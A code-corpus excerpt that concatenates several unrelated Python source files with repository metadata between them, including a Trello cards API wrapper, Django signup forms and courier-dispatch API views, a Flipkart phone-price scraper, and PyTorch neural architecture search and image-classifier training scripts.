query = SQL("SELECT {0}, {1}, {2} FROM gps_smallhash WHERE {3}").format(Identifier("order"), Identifier("hash"), Identifier("counter"), query)
cur.execute(query, values)
for vec in cur:
hashlookup[vec[0], vec[1]].append(f'{vec[0]}.{vec[2]}')
out = [hashlookup.get(pair, [f"{pair[0]}.0"]) for pair in hashes]
if args.output:
with open(args.output, "a") as F:
for opts in out:
_ = F.write("|".join(opts) + "\n")
else:
for opts in out:
print("|".join(opts))
| roed314/FiniteGroups | Code/identify.py | identify.py | py | 4,140 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "sys.stdin.read",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "sys.stdin",
"line_number": 63,
"usage_type": "attribute"
},
{
"api_name": "collections.def... |
72164631784 | # -*- encoding: utf-8 -*-
# External imports
import requests
import json
import datetime
# ---------------------------------------- Ne pas mettre là
# # Load settings
# with open('settings.json', encoding="utf-8") as f:
# settings = json.load(f)
# # Get the original file
# API_KEY = settings["API_KEY"]
# TOKEN = settings["TOKEN"]
# idList = settings["create_card_default_list_id"]
# idLabels = ["636b89573b1806052382168b", "6371f95494e5ba0140868cdd"]
# name = "Test création Python"
# desc = "Test description"
# ---------------------------------------- Fin du ne pas mettre là
class Trello_API_cards(object):
"""Trello_API_cards
=======
On init take as arguments :
- api {str} : name of the API to call
- "new_card"
- "update_card"
- "new_comment"
- "add_label"
- "remove_label"
- API_KEY {str}
- TOKEN {str}
- [optional] service {str} : name of the service
- data {dict} : all informations needed to use the API
"""
def __init__(self, api , API_KEY, TOKEN, service='Trello_Cards', data={}):
# self.logger = logging.getLogger(service)
self.endpoint = "https://api.trello.com/1/cards"
self.service = service
self.payload = {
'key': API_KEY,
'token': TOKEN
}
self.headers = {
"Accept":"application/json"
}
# Différentes API
if api == "new_card":
self.payload["pos"] = "top"
self.payload["start"] = datetime.datetime.now().isoformat()
self.payload["idList"] = data["idList"]
self.payload["idLabels"] = data["idLabels"]
self.payload["name"] = data["name"]
self.payload["desc"] = data["desc"]
self.HTTPmethod = "POST"
self.url = self.endpoint
elif api == "update_card":
param_list = ["pos", "idList", "idLabels", "name", "desc"]
for param in param_list:
if param in data:
self.payload[param] = data[param]
self.HTTPmethod = "PUT"
self.url = self.endpoint + "/{}".format(data["id"])
elif api == "new_comment":
self.payload["text"] = data["text"]
self.HTTPmethod = "POST"
self.url = self.endpoint + "/{}/actions/comments".format(data["id"])
elif api == "add_label":
self.payload["value"] = data["value"]
self.HTTPmethod = "POST"
self.url = self.endpoint + "/{}/idLabels".format(data["id"])
elif api == "remove_label":
self.HTTPmethod = "DELETE"
self.url = self.endpoint + "/{}/idLabels/{}".format(data["id"], data["idLabel"])
try:
r = requests.request(self.HTTPmethod, self.url, headers=self.headers, params=self.payload)
r.raise_for_status()
except requests.exceptions.HTTPError:
self.status = 'Error'
# self.logger.error("{} :: {} :: HTTP Status: {} || Method: {} || URL: {} || Response: {}".format(query, service, r.status_code, r.request.method, r.url, r.text))
self.error_msg = "Biblionumber inconnu ou service indisponible"
except requests.exceptions.RequestException as generic_error:
self.status = 'Error'
# self.logger.error("{} :: Koha_API_PublicBiblio_Init :: Generic exception || URL: {} || {}".format(bibnb, url, generic_error))
self.error_msg = "Exception générique, voir les logs pour plus de détails"
else:
self.response = r.content.decode('utf-8')
self.data = json.loads(self.response)
self.status = 'Success'
# self.logger.debug("{} :: {} :: Notice trouvée".format(query, service)) | Alban-Peyrat/Trello_API_interface | Trello_API_cards.py | Trello_API_cards.py | py | 3,799 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.datetime.now",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 52,
"usage_type": "attribute"
},
{
"api_name": "requests.request",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "request... |
22377866084 | from django import forms
from django.db import transaction
from .models import CustomUser
from django.contrib.auth.forms import UserCreationForm,UserChangeForm
class CustomerSignUpForm(UserCreationForm):
class Meta:
model=CustomUser
fields = ('username', 'name', 'email', 'number', 'address')
@transaction.atomic
def save(self):
user = super().save(commit=False)
user.is_customer = True
user.save()
return user
class StartupSignUpForm(UserCreationForm):
class Meta:
model=CustomUser
fields = ('username', 'name', 'email', 'number', 'address','dipp','description')
@transaction.atomic
def save(self):
user = super().save(commit=False)
user.is_startup = True
user.save()
return user | aditrisinha/Aagman | accounts/forms.py | forms.py | py | 807 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.contrib.auth.forms.UserCreationForm",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "models.CustomUser",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "django.db.transaction.atomic",
"line_number": 11,
"usage_type": "attribute"
... |
74361688425 | from datetime import datetime
import logging
from django.contrib.auth import authenticate
from django.core import serializers
from django.http import HttpResponse, HttpResponseBadRequest
from django.shortcuts import get_object_or_404
from django.views.decorators.csrf import csrf_exempt
from django.contrib.auth import login as auth_login
from dispatch.models import ETurtleGroup as Group
from server.dispatch.dispatcher import run_dispatcher
from server.dispatch.models import Courier, Dispatch, Package
from server.utils import api_permission_required, HttpResponseUnauthorized
import json
@csrf_exempt
def loginview(request):
if not request.method=='POST':
return HttpResponseBadRequest("post required")
username = request.POST.get('username' or None)
password = request.POST.get('password' or None)
if not (username and password):
return HttpResponseBadRequest("invalid or missing parameters")
user = authenticate(username=username, password=password)
if user and user.is_active and user.has_perm("dispatch.api_access"):
auth_login(request, user)
return HttpResponse("Logged in")
return HttpResponseUnauthorized('Unathorized')
@api_permission_required
def check_in(request):
courier = Courier.objects.get(id=request.user.id)
courier.state = Courier.STATE_STANDING_BY
courier.save()
run_dispatcher()
return HttpResponse('checked in')
@api_permission_required
def leave(request):
courier = Courier.objects.get(id=request.user.id)
courier.state = Courier.STATE_IDLE
courier.save()
try:
dispatch = Dispatch.objects.get(courier=courier, state=Dispatch.STATE_PENDING)
except Dispatch.DoesNotExist:
pass
else:
#updates the state of the Dispatch
dispatch.state = Dispatch.STATE_REJECTED
dispatch.save()
#updates the state of the Package
dispatch.package.state=Package.STATE_NEW
dispatch.package.save()
run_dispatcher()
return HttpResponse('left')
@api_permission_required
def decline(request):
courier = Courier.objects.get(id=request.user.id)
dispatch = get_object_or_404(Dispatch, courier=courier, state=Dispatch.STATE_PENDING)
#updates the state of the Dispatch
dispatch.state = Dispatch.STATE_REJECTED
dispatch.save()
#updates the state of the Courier
courier.state = Courier.STATE_STANDING_BY
courier.save()
#updates the state of the Package
dispatch.package.state=Package.STATE_NEW
dispatch.package.save()
run_dispatcher()
return HttpResponse('declined')
@api_permission_required
def get(request):
courier = Courier.objects.get(id=request.user.id)
dispatch = get_object_or_404(Dispatch, courier=courier, state=Dispatch.STATE_PENDING)
package = dispatch.package
dump = package.serialize()
response = HttpResponse(dump)
response['Content-Type'] = 'application/json; charset=utf-8'
return response
@api_permission_required
def accept(request):
courier = Courier.objects.get(id=request.user.id)
#get the corresponding Dispatch object
dispatch = get_object_or_404(Dispatch, courier=courier, state=Dispatch.STATE_PENDING)
#updates the state of the pending dispatch
dispatch.state=Dispatch.STATE_SHIPPING
dispatch.save()
#updates the state of the Courier
courier.state = Courier.STATE_SHIPPING
courier.save()
#updates the state of the package
dispatch.package.state=Package.STATE_SHIPPING
dispatch.package.save()
return HttpResponse('accepted')
@api_permission_required
def complete(request):
courier = Courier.objects.get(id=request.user.id)
#get the corresponding Dispatch object
dispatch = get_object_or_404(Dispatch, courier=courier, state=Dispatch.STATE_SHIPPING)
dispatch.state=Dispatch.STATE_SHIPPED
dispatch.save()
#updates the state of the Courier
courier.state = Courier.STATE_IDLE
courier.save()
#updates the state of the package
dispatch.package.state=Package.STATE_SHIPPED
dispatch.package.save()
return HttpResponse('completed')
@api_permission_required
def fail(request):
courier = Courier.objects.get(id=request.user.id)
#get the corresponding Dispatch object
dispatch = get_object_or_404(Dispatch, courier=courier, state=Dispatch.STATE_SHIPPING)
dispatch.state=Dispatch.STATE_FAILED
dispatch.save()
#updates the state of the Courier
courier.state = Courier.STATE_IDLE
courier.save()
#updates the state of the package
dispatch.package.state=Package.STATE_FAILED
dispatch.package.save()
return HttpResponse('failed')
@csrf_exempt
@api_permission_required
def loc_update(request):
if not request.method=='POST':
return HttpResponseBadRequest("post required")
lat = request.POST.get('lat' or None)
lng = request.POST.get('lng' or None)
if not (lat and lng):
return HttpResponseBadRequest("invalid or missing parameters")
courier = Courier.objects.get(id=request.user.id)
courier.lat = lat
courier.lng = lng
courier.last_pos_update = datetime.now()
courier.save()
logger = logging.getLogger('location_logger')
logger.info("%s: %s, %s @ %s" % (courier,lat,lng,courier.last_pos_update.isoformat()))
return HttpResponse('location updated')
@csrf_exempt
@api_permission_required
def c2dmkey_update(request):
if not request.method=='POST':
return HttpResponseBadRequest("post required")
registration_id = request.POST.get('registration_id')
if not registration_id:
return HttpResponseBadRequest("invalid or missing parameters")
courier = Courier.objects.get(id=request.user.id)
courier.c2dmkey = registration_id
courier.save()
logger = logging.getLogger('c2dm_logger')
logger.info("%s: %s @ %s" % (courier,registration_id,datetime.now()))
return HttpResponse('c2dm key updated')
| lepilepi/eturtle | server/api/views.py | views.py | py | 5,950 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "django.http.HttpResponseBadRequest",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "django.http.HttpResponseBadRequest",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "django.contrib.auth.authenticate",
"line_number": 24,
"usage_type":... |
39056592319 | from numpy import array,zeros
from matplotlib import pyplot as plt
num='0016'
path='/Users/dmelgar/Slip_inv/Amatrice_3Dfitsgeol_final1/output/inverse_models/models/_previous/'
root1='bigkahuna_vrtest3win_vr'
root2='.'+num+'.log'
vr=array([1.6,1.8,2.0,2.2,2.4,2.6])
vr_static=zeros(len(vr))
vr_insar=zeros(len(vr))
vr_velocity=zeros(len(vr))
for k in range(len(vr)):
f=open(path+root1+str(vr[k])+root2,'r')
while True:
line=f.readline()
if 'VR static' in line:
vr_static[k]=float(line.split('=')[-1])
elif 'VR velocity' in line:
vr_velocity[k]=float(line.split('=')[-1])
elif 'VR InSAR' in line:
vr_insar[k]=float(line.split('=')[-1])
break
f.close()
plt.figure()
plt.plot(vr,vr_static+19)
plt.plot(vr,vr_velocity+44)
plt.plot(vr,vr_insar+14)
plt.legend(['GPS','SM','InSAR'],loc=3)
plt.xlabel('vr (km/s)')
plt.ylabel('VR (%)')
plt.show() | Ogweno/mylife | amatrice/plot_vr_test.py | plot_vr_test.py | py | 935 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.array",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 1... |
73818234985 | import requests
from bs4 import BeautifulSoup
from database import DataBase
from log import log
from scrape import Scrape
class Flipkart(Scrape):
def formatData(self, soupText):
"""
This function extracts specific information from the `soupText` object and returns it in a formatted manner.
Args:
soupText (bs4.BeautifulSoup): An object of the BeautifulSoup class.
Returns:
tuple: A tuple containing the following information in the following order:
- phone (str): The phone name, extracted from the `soupText` object.
- price (str): The price of the phone, extracted from the `soupText` object.
- ramD (str): The amount of RAM in the phone, extracted from the `soupText` object.
"""
phone = soupText.find("div", class_="_4rR01T")
price = soupText.find("div", class_="_30jeq3 _1_WHN1")
ram = soupText.find_all("li", class_="rgWa7D")
ramD = 0
# formatting the phone and price variable and extracting the Ram value
if price is not None:
price = price.text
price = price.replace(",", "")
price = price.replace("₹", "")
if price is None:
price = 0
if phone is not None:
phone = phone.text
# formatting the Ram value
for oneRam in ram:
if "RAM" in oneRam.text:
ramList = oneRam.text.split("|")
for one in ramList:
if "RAM" in one:
ramD = one
ramD = ramD.replace("GB", "")
ramD = ramD.replace("RAM", "")
ramD = ramD.replace(" ", "")
ramD = ramD.replace("MB", "")
return phone, price, ramD
def scrape(self, hostname):
"""
This function scrapes information about smartphones from the Amazon.in website and stores the information
in a collection.
Args:
self: The instance of the class that the function is being called on.This argument provides access to
the attributes and methods of the class,
hostname: The Database host name
Returns:
"""
self.item = DataBase(hostname).getIndex()
while self.soup.find('a', class_='_1LKTO3'):
log.info("Scrapping flipkart.com website, page no. :" + str(self.page))
url = self.url2 + str(self.page)
req = requests.get(url, headers=self.headers)
self.soup = BeautifulSoup(req.content, 'html.parser')
box = self.soup.find_all("div", class_="_2kHMtA")
for onePhone in box:
data = self.formatData(onePhone)
if data not in self.listPhone:
self.item += 1
self.listPhone.append(data)
info = {
"_id": self.item,
"name": data[0],
"price": float(data[1]),
"ram": int(data[2])
}
self.phoneinfo.append(info)
self.page += 1
log.info("Scrapping Completed for flipkart.com")
| ujitkumar1/ramranger | src/flipkart_scrape.py | flipkart_scrape.py | py | 3,338 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "scrape.Scrape",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "database.DataBase",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "log.log.info",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "log.log",
"line_numbe... |
22372717524 | import os
import sys
import time
import glob
import numpy as np
import torch
import utils
import logging
import argparse
import torch.nn as nn
import torch.utils
import torch.nn.functional as F
import torchvision.datasets as dset
import torch.backends.cudnn as cudnn
from torch.autograd import Variable
from model_search_lfm import Network, Network_w
from architect_lfm import Architect
from encoder_resnet import *
from types import SimpleNamespace
from torch.utils.tensorboard import SummaryWriter
parser = argparse.ArgumentParser("cifar")
parser.add_argument('--data', type=str, default='../data',
help='location of the data corpus')
parser.add_argument('--batch_size', type=int, default=32, help='batch size')
parser.add_argument('--learning_rate_min', type=float,
default=0.00025, help='minimum learning rate')
parser.add_argument('--report_freq', type=float,
default=1, help='report frequency')
parser.add_argument('--gpu', type=str, default='0', help='gpu device id')
parser.add_argument('--epochs', type=int, default=50,
help='num of training epochs')
parser.add_argument('--init_channels', type=int,
default=16, help='num of init channels')
parser.add_argument('--layers', type=int, default=8,
help='total number of layers')
parser.add_argument('--model_path', type=str,
default='saved_models', help='path to save the model')
parser.add_argument('--cutout', action='store_true',
default=False, help='use cutout')
parser.add_argument('--cutout_length', type=int,
default=16, help='cutout length')
parser.add_argument('--drop_path_prob', type=float,
default=0.3, help='drop path probability')
parser.add_argument('--save', type=str, default='EXP', help='experiment name')
parser.add_argument('--seed', type=int, default=2, help='random seed')
parser.add_argument('--train_portion', type=float,
default=0.5, help='portion of training data')
parser.add_argument('--unrolled', action='store_true',
default=False, help='use one-step unrolled validation loss')
# new hyperparams.
parser.add_argument('--learning_rate_w1', type=float, default=1e-2)
parser.add_argument('--learning_rate_w2', type=float, default=1e-2)
parser.add_argument('--learning_rate_A', type=float, default=1e-3)
parser.add_argument('--learning_rate_V', type=float, default=1e-2)
parser.add_argument('--learning_rate_r', type=float, default=1e-2)
parser.add_argument('--momentum_w1', type=float, default=0.9, help='momentum')
parser.add_argument('--momentum_w2', type=float, default=0.9, help='momentum')
parser.add_argument('--momentum_A', type=float, default=0.9, help='momentum')
parser.add_argument('--momentum_V', type=float, default=0.9, help='momentum')
parser.add_argument('--momentum_r', type=float, default=0.9, help='momentum')
parser.add_argument('--weight_decay_w1', type=float, default=1e-4)
parser.add_argument('--weight_decay_w2', type=float, default=1e-4)
parser.add_argument('--weight_decay_A', type=float, default=1e-5)
parser.add_argument('--weight_decay_V', type=float, default=1e-4)
parser.add_argument('--weight_decay_r', type=float, default=1e-4)
parser.add_argument('--grad_clip_w1', type=float, default=5)
parser.add_argument('--grad_clip_w2', type=float, default=5)
parser.add_argument('--grad_clip_A', type=float, default=5)
parser.add_argument('--grad_clip_V', type=float, default=5)
parser.add_argument('--grad_clip_r', type=float, default=5)
parser.add_argument('--is_parallel', type=int, default=0)
parser.add_argument('--encoder_size', type=str, default='18')
parser.add_argument('--is_cifar100', type=int, default=0)
parser.add_argument('--resume', type=str, default='')
args = parser.parse_args()
args.save = 'search-{}-{}'.format(args.save, time.strftime("%Y%m%d-%H%M%S"))
writer = SummaryWriter(filename_suffix=time.strftime("%Y%m%d-%H%M%S"))
CIFAR_CLASSES = 10
CIFAR100_CLASSES = 100
def save_checkpoint(state, checkpoint=args.save, filename='checkpoint.pth.tar'):
filepath = os.path.join(checkpoint, filename)
torch.save(state, filepath)
def main():
if not torch.cuda.is_available():
logging.info('no gpu device available')
sys.exit(1)
np.random.seed(args.seed)
if not args.is_parallel:
torch.cuda.set_device(int(args.gpu))
logging.info('gpu device = %d' % int(args.gpu))
else:
logging.info('gpu device = %s' % args.gpu)
cudnn.benchmark = True
torch.manual_seed(args.seed)
cudnn.enabled = True
torch.cuda.manual_seed(args.seed)
logging.info("args = %s", args)
criterion = nn.CrossEntropyLoss()
criterion = criterion.cuda()
# model contains w1, w2 and A
if args.is_cifar100:
model = Network(args.init_channels, CIFAR100_CLASSES, args.layers, criterion, args.is_parallel, args.gpu)
else:
model = Network(args.init_channels, CIFAR_CLASSES, args.layers, criterion, args.is_parallel, args.gpu)
torch.save(model.w_temp, os.path.join(args.save, 'w_temp.pt'))
# encoder contains V
if args.encoder_size == '18':
encoder = resnet18(pretrained=True).cuda()
elif args.encoder_size == '34':
encoder = resnet34(pretrained=True).cuda()
elif args.encoder_size == '50':
encoder = resnet50(pretrained=True).cuda()
elif args.encoder_size == '101':
encoder = resnet101(pretrained=True).cuda()
# contains r
# TODO: check input size
r_vec = nn.Sequential(nn.Linear(args.batch_size, 1, bias=False)).cuda()
r_vec[0].weight = nn.Parameter(torch.ones_like(r_vec[0].weight) + 1e-3*torch.randn_like(r_vec[0].weight))
if args.is_parallel:
args.gpu = '0,1'
gpus = [int(i) for i in args.gpu.split(',')]
encoder = nn.parallel.DataParallel(
encoder, device_ids=gpus, output_device=gpus[1])
model.w1 = nn.parallel.DataParallel(
model.w1, device_ids=gpus, output_device=gpus[1])
model.w2 = nn.parallel.DataParallel(
model.w2, device_ids=gpus, output_device=gpus[1])
encoder = encoder.module
model.w1 = model.w1.module
model.w2 = model.w2.module
# logging.info("param size = %fMB", utils.count_parameters_in_MB(model))
optimizers = SimpleNamespace(
w1=torch.optim.SGD(
model.w1.parameters(),
args.learning_rate_w1,
momentum=args.momentum_w1,
weight_decay=args.weight_decay_w1),
w2=torch.optim.SGD(
model.w2.parameters(),
args.learning_rate_w2,
momentum=args.momentum_w2,
weight_decay=args.weight_decay_w2),
A=torch.optim.Adam(
model.arch_parameters(),
lr=args.learning_rate_A, betas=(0.5, 0.999),
weight_decay=args.weight_decay_A),
V=torch.optim.Adam(
encoder.parameters(),
lr=args.learning_rate_V, betas=(0.5, 0.999),
weight_decay=args.weight_decay_V),
r=torch.optim.Adam(
r_vec.parameters(),
lr=args.learning_rate_r, betas=(0.5, 0.999),
weight_decay=args.weight_decay_r)
)
lr = SimpleNamespace(
w1=args.learning_rate_w1,
w2=args.learning_rate_w2,
A=args.learning_rate_A,
V=args.learning_rate_V,
r=args.learning_rate_r
)
if args.is_cifar100:
train_transform, valid_transform = utils._data_transforms_cifar100(args)
else:
train_transform, valid_transform = utils._data_transforms_cifar10(args)
if args.is_cifar100:
train_data = dset.CIFAR100(root=args.data, train=True,
download=True, transform=train_transform)
else:
train_data = dset.CIFAR10(root=args.data, train=True,
download=True, transform=train_transform)
num_train = len(train_data)
indices = list(range(num_train))
split = int(np.floor(args.train_portion * num_train))
train_queue = torch.utils.data.DataLoader(
train_data, batch_size=args.batch_size,
sampler=torch.utils.data.sampler.SubsetRandomSampler(indices[:split]),
pin_memory=False, num_workers=4, drop_last=True)
valid_queue = torch.utils.data.DataLoader(
train_data, batch_size=args.batch_size,
sampler=torch.utils.data.sampler.SubsetRandomSampler(indices[split:num_train]),
pin_memory=False, num_workers=4, drop_last=True)
schedulers = SimpleNamespace(
w1=torch.optim.lr_scheduler.CosineAnnealingLR(
optimizers.w1, float(args.epochs), eta_min=args.learning_rate_min),
w2=torch.optim.lr_scheduler.CosineAnnealingLR(
optimizers.w2, float(args.epochs), eta_min=args.learning_rate_min),
A=torch.optim.lr_scheduler.CosineAnnealingLR(
optimizers.A, float(args.epochs), eta_min=args.learning_rate_min),
V=torch.optim.lr_scheduler.CosineAnnealingLR(
optimizers.V, float(args.epochs), eta_min=args.learning_rate_min),
r=torch.optim.lr_scheduler.CosineAnnealingLR(
optimizers.r, float(args.epochs), eta_min=args.learning_rate_min)
)
architect = Architect(model, encoder, r_vec, args, optimizers, lr)
start_epoch = 0
if args.resume:
checkpoint = torch.load(os.path.join(args.resume, 'checkpoint.pth.tar'))
start_epoch = checkpoint['epoch']
optimizers.w1.load_state_dict(checkpoint['optimizer-w1'])
optimizers.w2.load_state_dict(checkpoint['optimizer-w2'])
optimizers.A.load_state_dict(checkpoint['optimizer-A'])
optimizers.V.load_state_dict(checkpoint['optimizer-V'])
optimizers.r.load_state_dict(checkpoint['optimizer-r'])
schedulers.w1.load_state_dict(checkpoint['scheduler-w1'])
schedulers.w2.load_state_dict(checkpoint['scheduler-w2'])
schedulers.A.load_state_dict(checkpoint['scheduler-A'])
schedulers.V.load_state_dict(checkpoint['scheduler-V'])
schedulers.r.load_state_dict(checkpoint['scheduler-r'])
model = torch.load(os.path.join(args.resume, 'weights_model.pt')).cuda()
encoder = torch.load(os.path.join(args.resume, 'weights_encoder.pt')).cuda()
r_vec = torch.load(os.path.join(args.resume, 'weights_r.pt')).cuda()
for epoch in range(start_epoch, args.epochs):
for i in schedulers.__dict__:
lr.__dict__[i] = schedulers.__dict__[i].get_last_lr()[0]
# TODO: verify the loop above and then delete below
####lr.w1 = schedulers.w1.get_lr()[0]
####lr.w2 = schedulers.w2.get_lr()[0]
####lr.A = schedulers.A.get_lr()[0]
####lr.V = schedulers.V.get_lr()[0]
####lr.r = schedulers.r.get_lr()[0]
logging.info('epoch %d lr_w1 %f lr_w2 %f lr_A %f lr_V %f lr_r %f', epoch, lr.w1, lr.w2, lr.A, lr.V, lr.r)
genotype = model.genotype()
logging.info('genotype = %s', genotype)
# TODO: log genotypes to a folder and use some good file format -> make it usable with visualize
print(F.softmax(model.alphas_normal, dim=-1))
print(F.softmax(model.alphas_reduce, dim=-1))
# training
train_acc, train_obj = train(
train_queue, valid_queue, model,
architect, criterion, optimizers, lr)
logging.info('train_acc %f', train_acc)
logging.info('train_loss %f', train_obj)
for i in schedulers.__dict__:
schedulers.__dict__[i].step()
# validation
valid_acc, valid_obj = infer(valid_queue, model, architect, criterion)
logging.info('valid_acc %f', valid_acc)
logging.info('valid_loss %f', valid_obj)
# save for the re-training
torch.save(model, os.path.join(args.save, 'weights_model.pt'))
torch.save(encoder, os.path.join(args.save, 'weights_encoder.pt'))
torch.save(r_vec, os.path.join(args.save, 'weights_r.pt'))
save_checkpoint({
'epoch': epoch + 1,
'scheduler_w1': schedulers.w1.state_dict(),
'scheduler-w2': schedulers.w2.state_dict(),
'scheduler-A': schedulers.A.state_dict(),
'scheduler-V': schedulers.V.state_dict(),
'scheduler-r': schedulers.r.state_dict(),
'optimizer-w1': optimizers.w1.state_dict(),
'optimizer-w2': optimizers.w2.state_dict(),
'optimizer-A': optimizers.A.state_dict(),
'optimizer-V': optimizers.V.state_dict(),
'optimizer-r': optimizers.r.state_dict(),
})
writer.close()
def train(train_queue, valid_queue,
model, architect, criterion, optimizers, lr):
objs = utils.AvgrageMeter()
top1 = utils.AvgrageMeter()
top5 = utils.AvgrageMeter()
g_step = 0
# for step, ((input, target), (input_val, target_val)) in enumerate(zip(train_queue, valid_queue)):
for step, (input, target) in enumerate(train_queue):
model.train()
architect.encoder.train()
n = input.size(0)
input = input.cuda()
target = target.cuda(non_blocking=True)
# get a random minibatch from the search queue with replacement
input_val, target_val = next(iter(valid_queue))
input_val = input_val.cuda()
target_val = target_val.cuda(non_blocking=True)
###Architect.step will perform W1, W2, V, r, and A updates.
###because equations are all linked, its better to have their updates in a single place
### be careful of leaking gradients!!
architect.step(input, target, input_val, target_val, unrolled=args.unrolled, save_dir=args.save)
# TODO: think on using w1, w2, or average results
logits = model.forward(input, 'w2')
loss = criterion(logits, target)
prec1, prec5 = utils.accuracy(logits, target, topk=(1, 5))
objs.update(loss.item(), n)
top1.update(prec1.item(), n)
top5.update(prec5.item(), n)
writer.add_scalar("train_loss", objs.avg, g_step)
writer.add_scalar("train_top1", top1.avg, g_step)
writer.add_scalar("train_top5", top5.avg, g_step)
if step % args.report_freq == 0:
logging.info('train (on w2) %03d %e %f %f', g_step, objs.avg, top1.avg, top5.avg)
g_step += 1
return top1.avg, objs.avg
def infer(valid_queue, model, architect, criterion):
objs = utils.AvgrageMeter()
top1 = utils.AvgrageMeter()
top5 = utils.AvgrageMeter()
model.eval()
architect.encoder.eval()
g_step = 0
with torch.no_grad():
for step, (input, target) in enumerate(valid_queue):
input = input.cuda()
target = target.cuda(non_blocking=True)
# TODO: w1 or w2 or average the two
logits = model.forward(input, 'w2')
loss = criterion(logits, target)
prec1, prec5 = utils.accuracy(logits, target, topk=(1, 5))
n = input.size(0)
objs.update(loss.item(), n)
top1.update(prec1.item(), n)
top5.update(prec5.item(), n)
writer.add_scalar("val_top5", top5.avg, g_step)
writer.add_scalar("val_loss", objs.avg, g_step)
writer.add_scalar("val_top1", top1.avg, g_step)
if step % args.report_freq == 0:
logging.info('valid %03d %e %f %f', g_step, objs.avg, top1.avg, top5.avg)
g_step += 1
return top1.avg, objs.avg
if __name__ == '__main__':
utils.create_exp_dir(args.save, scripts_to_save=glob.glob('*.py'))
log_format = '%(asctime)s %(message)s'
logging.basicConfig(stream=sys.stdout, level=logging.INFO,
format=log_format, datefmt='%m/%d %I:%M:%S %p')
fh = logging.FileHandler(os.path.join(args.save, 'log.txt'))
fh.setFormatter(logging.Formatter(log_format))
logging.getLogger().addHandler(fh)
main()
| importZL/LFM | NAS/darts-lfm/train_search_lfm.py | train_search_lfm.py | py | 15,995 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "time.strftime",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "torch.utils.tensorboard.SummaryWriter",
"line_number": 81,
"usage_type": "call"
},
{
"api_n... |
2026891662 | import argparse
import torch
from torch.autograd import Variable
from network_prep import create_loaders, prep_model, create_classifier
def get_input_args():
parser = argparse.ArgumentParser(description='Get NN arguments')
parser.add_argument('data_dir', type=str, help='mandatory data directory')
parser.add_argument('--save_dir', default='', help='Directory to save checkpoint.')
parser.add_argument('--arch', default='vgg', help='default architecture, options: vgg, densenet, resnet')
parser.add_argument('--learning_rate', default=0.001, type=float, help='default learning rate')
parser.add_argument('--hidden_units', default='512', type=str, help='default hidden layer sizes')
parser.add_argument('--output_size', default=102, type=int, help='default hidden output_size')
parser.add_argument('--epochs', default=3, type=int, help='default training epochs')
parser.add_argument('--gpu', default=False, action='store_true', help='use GPU processing')
return parser.parse_args()
def train_classifier(model, trainloader, validloader, criterion, optimizer, epochs, gpu):
steps = 0
print_every = 40
run_loss = 0
if gpu and torch.cuda.is_available():
print('GPU TRAINING')
model.cuda()
elif gpu and torch.cuda.is_available() == False:
print('GPU processing selected but no NVIDIA drivers found... Training under cpu')
else:
print('CPU TRAINING')
for e in range(epochs):
model.train()
for images, labels in iter(trainloader):
steps += 1
images, labels = Variable(images), Variable(labels)
if gpu and torch.cuda.is_available():
images, labels = images.cuda(), labels.cuda()
optimizer.zero_grad()
out = model.forward(images)
loss = criterion(out, labels)
loss.backward()
optimizer.step()
run_loss += loss.data.item()
if steps % print_every == 0:
model.eval()
acc = 0
valid_loss = 0
for images, labels in iter(validloader):
images, labels = Variable(images), Variable(labels)
if gpu and torch.cuda.is_available():
images, labels = images.cuda(), labels.cuda()
with torch.no_grad():
out = model.forward(images)
valid_loss += criterion(out, labels).data.item()
ps = torch.exp(out).data
equality = (labels.data == ps.max(1)[1])
acc += equality.type_as(torch.FloatTensor()).mean()
print("Epoch: {}/{}.. ".format(e+1, epochs),
"Training Loss: {:.3f}..".format(run_loss/print_every),
"Valid Loss: {:.3f}..".format(valid_loss/len(validloader)),
"Valid Accuracy: {:.3f}".format(acc/len(validloader)))
run_loss = 0
model.train()
print('{} EPOCHS COMPLETE. MODEL TRAINED.'.format(epochs))
return model
def test_classifier(model, testloader, criterion, gpu):
if gpu and torch.cuda.is_available():
print('GPU TESTING')
model.cuda()
elif gpu and torch.cuda.is_available() == False:
print('CPU processing selected but no NVIDIA drivers found... testing under cpu')
else:
print('CPU TESTING')
model.eval()
acc = 0
test_loss = 0
for images, labels in iter(testloader):
images, labels = Variable(images), Variable(labels)
if gpu and torch.cuda.is_available():
images, labels = images.cuda(), labels.cuda()
with torch.no_grad():
out = model.forward(images)
test_loss += criterion(out, labels).data.item()
ps = torch.exp(out).data
equality = (labels.data == ps.max(1)[1])
acc += equality.type_as(torch.FloatTensor()).mean()
print("Test Loss: {:.3f}..".format(test_loss/len(testloader)),
"Test Accuracy: {:.3f}".format(acc/len(testloader)))
pass
def save_model_checkpoint(model, input_size, epochs, save_dir, arch, learning_rate, class_idx, optimizer, output_size):
saved_model = {
'input_size':input_size,
'epochs':epochs,
'arch':arch,
'hidden_units':[each.out_features for each in model.classifier if hasattr(each, 'out_features') == True],
'output_size':output_size,
'learning_rate':learning_rate,
'class_to_idx':class_idx,
'optimizer_dict':optimizer.state_dict(),
'classifier':model.classifier,
'state_dict':model.state_dict()
}
if len(save_dir) == 0:
save_path = save_dir + 'checkpoint.pth'
else:
save_path = save_dir + '/checkpoint.pth'
torch.save(saved_model, save_path)
